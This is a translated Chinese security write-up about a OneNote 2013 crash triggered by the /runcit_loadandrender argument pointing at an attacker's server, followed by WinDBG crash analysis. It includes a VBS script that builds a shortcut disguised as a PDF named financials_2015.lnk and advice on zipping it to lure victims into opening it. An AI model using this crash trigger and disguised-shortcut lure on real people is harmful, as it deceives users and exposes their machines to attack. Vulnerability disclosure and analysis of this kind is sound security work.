问题存在

软件:One Note 2013
操作系统名称:Microsoft Windows 7 Professional
操作系统版本:6.1.7601 Service Pack 1 Build 7601
制造商:微软公司

根据WinDBG的!exploitable扩展,微软OneNote 2013至少存在一个拒绝服务漏洞并且极易造成远程代码执行。

当你在你所控制的web服务器的根目录下通过/runcit_loadandrender请求一个以下文件类型之一的URL,该问题就显现出来了:

index.htm
index.htm.old
index.html
index.html.old
index.php
index.php.old

需要注意的是,对于该漏洞所有请求上述的文件都在远程web服务器根目录下,但是不能够直接请求。当单纯的调用web服务器下的根目录,OneNote似乎会去检测上述文件是否存在。

Part 1: 设置及执行

首先在你控制的服务器上创建一个index.htm(或者上述的文件类型)文件。在该文件中不需要任何的内容,虽然对于长远的利用来说里面是需要呈现一些内容的,但是我们现在不需要考虑这么长远。

其次,在C:\Program Files\Microsoft Office 15\root\office15目录下运行以下CMD命令:

ONENOTE.EXE /runcit_loadandrender http://your_web_server.com/

注意上面的命令,我们没有直接请求index.htm文件。如果我们直接请求该文件,那是不会成功的。只需要将路径指向网络服务器的根目录即可。

执行上面的命令后,得到的结果:

Part 2: 分发

我们需要将一个文件传送到目标,在不产生过多让人生疑的情况下执行上述命令。

对于让用户自己执行上述命令来说几率小的可怜,但我们可以试试简单的将其压缩成.lnk文件

创建一个.lnk文件,我没有选择“右键>新建>快捷方式”这种处理方式,而是写了一个.vbs文件用来创建.lnk文件,最终发送到目标。

CreateLnk.vbs:

Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\temp\financials_2015.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
    oLink.TargetPath = "C:\Program Files\Microsoft Office 15\root\office15\ONENOTE.EXE"
    oLink.Arguments = "/runcit_loadandrender http://yourserver.com"
    oLink.Description = "Financials_2015"
oLink.Save

双击文件,会在C:\temp目录下创建一个financials_2015.lnk文件。记得替换相关信息!

更改快捷方式图标:

我们会使用PDF图标,你可以从http://www.cltd.net/images/PDF.ico抓取ico图标

右击/属性你刚才创建的.lnk文件,并单击“更改图标”按钮

指向你的PDF.ico文件,保存/应用等等,最后你应该可以看到:

将结果financials_2015.lnk添加到.ZIP文档内

大多数RCE利用都有结合社会工程学元素,这就是我们在这里所完成的事情。

警告:.lnk是不能从zip文件中直接打开的,所以需要用户解压文件。大多数用户都会解压文件,对么?目标接收.zip文件,提取.lnk文件,双击这份看起来很像PDF的文件,之后ONENOTE.exe带着我们的参数在执行!

仅供参考:或许使用记事本图标更不会引起用户的怀疑,但你得考虑到这份文件被打开的几率。这里就看你是怎么玩转社会工程学的呢!

Part 3: 调试崩溃 (某种程度上)

首先我是用系统内置的procdump.exe监控onenote.exe进程,可以得到一份.dmp文件

在同一个窗口:

procdump.exe -e -t -h -mp -w onenote.exe

敲击回车键开始监控ONENOTE.exe进程

在另外一个窗口,使用存在漏洞的参数执行你的ONENOTE.exe命令:

ONENOTE.EXE /runcit_loadandrender http://your_web_server.com/

在procdump中你可以看到这些有趣的东西:

正如我们看到的C0000005.ACCESS_VIOLATION,对于进一步分析.dmp文件来说这是一个好消息。

随着MSEC.dll扩展(!exploitable)在异常中得到一个初步的基础分析,我使用WinDBG来分析.dmp

打开WinDBG,本例中使用x86版本。CTRL+D导入.dmp文件

!analyze -v:

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
*** ERROR: Module load completed but symbols could not be loaded for ONENOTE.EXE
*** WARNING: Unable to verify timestamp for mso.dll
*** ERROR: Module load completed but symbols could not be loaded for mso.dll
GetPageUrlData failed, server returned HTTP status 404
URL requested: http://watson.microsoft.com/StageOne/ONENOTE_EXE/15_0_4763_1000/55f7f10c/ONMAIN_DLL/15_0_4779_1000/5641a4fc/c0000005/003806e3.htm?Retriage=1
FAULTING_IP: 
ONMAIN!Jot::Automation::ObjectModel::WriteToLog+39c42
629706e3 8b01            mov     eax,dword ptr [ecx]
EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 629706e3 (ONMAIN!Jot::Automation::ObjectModel::WriteToLog+0x00039c42)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000000
Attempt to read from address 00000000
DEFAULT_BUCKET_ID:  NULL_POINTER_READ
PROCESS_NAME:  ONENOTE.EXE
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  00000000
READ_ADDRESS:  00000000 
FOLLOWUP_IP: 
ONMAIN!Jot::Automation::ObjectModel::WriteToLog+39c42
629706e3 8b01            mov     eax,dword ptr [ecx]
MOD_LIST: 
NTGLOBALFLAG:  0
APPLICATION_VERIFIER_FLAGS:  0
FAULTING_THREAD:  00001a94
PRIMARY_PROBLEM_CLASS:  NULL_POINTER_READ
BUGCHECK_STR:  APPLICATION_FAULT_NULL_POINTER_READ
LAST_CONTROL_TRANSFER:  from 62970682 to 629706e3
STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
0022461c 62970682 00224640 00000000 91040962 ONMAIN!Jot::Automation::ObjectModel::WriteToLog+0x39c42
00224650 6285f7ca 002246f8 00000000 91041652 ONMAIN!Jot::Automation::ObjectModel::WriteToLog+0x39be1
00225960 6280781f 08eb5d18 06936480 00000000 ONMAIN!MsoCF::PerfMetrics::Finish+0x7d4b9
0022e84c 62659fa6 08ecd340 0022e87b 9104a752 ONMAIN!MsoCF::PerfMetrics::Finish+0x2550e
0022ec88 62659d89 068969a8 9104a386 08ecd340 ONMAIN!Jot::CJotSurfaceWnd::FScrollBarsOnLeftDefault+0xa933
0022ecb4 62637983 62e75c48 0022ed4c 08ecd340 ONMAIN!Jot::CJotSurfaceWnd::FScrollBarsOnLeftDefault+0xa716
0022ed14 62b8301e 0066cc30 0022ed4c 08ecd340 ONMAIN!Jot::ThemeColors::GetTranslatedColor+0x33a
0022ed68 62b831b0 08f16698 9104a2a6 069961b0 ONMAIN!Jot::MoveFolderDialog+0x207ee
0022ed94 62cee5ba 069961b0 0022ee00 62637983 ONMAIN!Jot::MoveFolderDialog+0x20980
0022eda0 62637983 62e80e6c 08ecd2e0 069961b0 ONMAIN!Jot::GetSchemaFromResourceAsString+0x19b7
0022ee00 01162cd8 0066cc30 0022ef04 069961b0 ONMAIN!Jot::ThemeColors::GetTranslatedColor+0x33a
0022ee18 011465fc 0022ef04 069961b0 9104bbeb ONENOTE+0x62cd8
0022f7a8 01102adb 01219070 00000001 9104b777 ONENOTE+0x465fc
0022fb34 0110217c 0121925c 005d4739 0022fbd8 ONENOTE+0x2adb
0022fb44 01102137 01100000 00000000 005d4739 ONENOTE+0x217c
0022fbd8 7715337a 7efde000 0022fc24 77959882 ONENOTE+0x2137
0022fbe4 77959882 7efde000 7940cd15 00000000 kernel32!BaseThreadInitThunk+0xe
0022fc24 77959855 01101a8c 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
0022fc3c 00000000 01101a8c 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  onmain!Jot::Automation::ObjectModel::WriteToLog+39c42
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: ONMAIN
IMAGE_NAME:  ONMAIN.DLL
DEBUG_FLR_IMAGE_TIMESTAMP:  5641a4fc
STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb
FAILURE_BUCKET_ID:  NULL_POINTER_READ_c0000005_ONMAIN.DLL!Jot::Automation::ObjectModel::WriteToLog
BUCKET_ID:  APPLICATION_FAULT_NULL_POINTER_READ_onmain!Jot::Automation::ObjectModel::WriteToLog+39c42
WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/ONENOTE_EXE/15_0_4763_1000/55f7f10c/ONMAIN_DLL/15_0_4779_1000/5641a4fc/c0000005/003806e3.htm?Retriage=1
Followup: MachineOwner
---------

!exploitable:

0:000> !load C:\Users\Desktop\MSECExtensions_1_6_0\x86\Release\MSEC.dll
0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at ONMAIN!Jot::Automation::ObjectModel::WriteToLog+0x0000000000039c42 (Hash=0x37399424.0xbf864ca4)
The data from the faulting address is later used as the target for a branch.

根据微软的!exploitable扩展,这是一个在空指针读取中“可能存在的利用”。

这个到底能不能利用欢迎看这个DuckDuckGo搜索结果

*原文地址:x4zx,编译/ 鸢尾,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

源链接

Hacking more

...